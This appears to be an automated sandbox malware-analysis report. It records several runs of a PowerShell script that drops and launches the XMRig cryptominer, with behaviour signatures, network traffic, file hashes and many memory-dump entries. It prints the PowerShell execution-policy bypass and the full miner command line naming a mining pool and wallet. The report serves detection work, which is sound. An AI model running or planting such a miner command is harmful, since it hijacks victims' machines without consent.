memory/796-82-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-83-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-84-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-85-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-86-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-87-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-88-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-89-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-90-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-91-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-92-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-93-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-94-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-95-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-96-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-97-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-98-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-99-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-100-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-101-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-102-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-103-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-104-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-105-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-106-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-107-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-108-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-109-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-110-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-111-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-112-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-113-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-114-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-115-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-116-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-117-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:47
Platform
win7-20231129-en
Max time kernel
1563s
Max time network
1564s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
Network
Files
memory/1276-4-0x000007FEF589E000-0x000007FEF589F000-memory.dmp
memory/1276-6-0x0000000002770000-0x0000000002778000-memory.dmp
memory/1276-5-0x000000001B590000-0x000000001B872000-memory.dmp
memory/1276-7-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
memory/1276-8-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
memory/1276-9-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
memory/1276-10-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
memory/1276-11-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
memory/1276-12-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:47
Platform
win10-20240611-en
Max time kernel
1794s
Max time network
1788s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5016 wrote to memory of 332 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5016 wrote to memory of 332 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.239.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/5016-3-0x00007FFD3B4E0000-0x00007FFD3B6BB000-memory.dmp
memory/5016-5-0x00007FFD3B4E0000-0x00007FFD3B6BB000-memory.dmp
memory/5016-6-0x00007FFD3B4E0000-0x00007FFD3B6BB000-memory.dmp
memory/5016-7-0x0000022CB97A0000-0x0000022CB97C2000-memory.dmp
memory/5016-10-0x0000022CB9970000-0x0000022CB99E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k0w2vads.551.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5016-25-0x00007FFD3B4E0000-0x00007FFD3B6BB000-memory.dmp
memory/5016-48-0x0000022CB9B10000-0x0000022CB9B22000-memory.dmp
memory/5016-61-0x0000022CB97D0000-0x0000022CB97DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/332-90-0x0000012072E50000-0x0000012072E70000-memory.dmp
memory/332-91-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/5016-92-0x00007FFD3B4E0000-0x00007FFD3B6BB000-memory.dmp
memory/332-93-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/5016-94-0x00007FFD3B4E0000-0x00007FFD3B6BB000-memory.dmp
memory/332-95-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-96-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-97-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-98-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-99-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-100-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-101-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-102-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-103-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-104-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-105-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-106-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-107-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-108-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-109-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-110-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-111-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-112-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-113-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-114-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-115-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-116-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-117-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-118-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-119-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-120-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-121-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-122-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-123-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-124-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-125-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-126-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-127-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-128-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-129-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-130-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-131-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-132-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-133-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-134-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-135-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-136-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-137-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-138-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-139-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-140-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-141-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-142-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-143-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-144-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-145-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-146-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-147-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-148-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-149-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-150-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-151-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-152-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-153-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-154-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-155-0x00007FF65F950000-0x00007FF660583000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:57
Platform
win11-20240611-en
Max time kernel
1799s
Max time network
1795s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 460 wrote to memory of 868 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 460 wrote to memory of 868 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/460-0-0x00007FFAFF153000-0x00007FFAFF155000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fszm2x45.dmy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/460-10-0x00007FFAFF150000-0x00007FFAFFC12000-memory.dmp
memory/460-9-0x000002751D8B0000-0x000002751D8D2000-memory.dmp
memory/460-11-0x00007FFAFF150000-0x00007FFAFFC12000-memory.dmp
memory/460-12-0x00007FFAFF150000-0x00007FFAFFC12000-memory.dmp
memory/460-14-0x000002751DA60000-0x000002751DA72000-memory.dmp
memory/460-15-0x000002751D900000-0x000002751D90A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/868-46-0x0000028D695E0000-0x0000028D69600000-memory.dmp
memory/868-47-0x0000028D6ADE0000-0x0000028D6AE00000-memory.dmp
memory/868-48-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/460-49-0x00007FFAFF153000-0x00007FFAFF155000-memory.dmp
memory/460-50-0x00007FFAFF150000-0x00007FFAFFC12000-memory.dmp
memory/868-51-0x0000028D6AE00000-0x0000028D6AE20000-memory.dmp
memory/868-52-0x0000028D6AE20000-0x0000028D6AE40000-memory.dmp
memory/460-54-0x00007FFAFF150000-0x00007FFAFFC12000-memory.dmp
memory/868-53-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-55-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-56-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-57-0x0000028D6AE00000-0x0000028D6AE20000-memory.dmp
memory/868-58-0x0000028D6AE20000-0x0000028D6AE40000-memory.dmp
memory/868-59-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-60-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-61-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-62-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-63-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-64-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-65-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-66-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-67-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-68-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-69-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-70-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-71-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-72-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-73-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-74-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-75-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-76-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-77-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-78-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-79-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-80-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-81-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-82-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-83-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-84-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-85-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-86-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-87-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-88-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-89-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-90-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-91-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-92-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-93-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-94-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-95-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-96-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-97-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-98-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-99-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-100-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-101-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-102-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-103-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-104-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-105-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-106-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-107-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-108-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-109-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-110-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-111-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-112-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-113-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-114-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-115-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-116-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-117-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:58
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1786s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
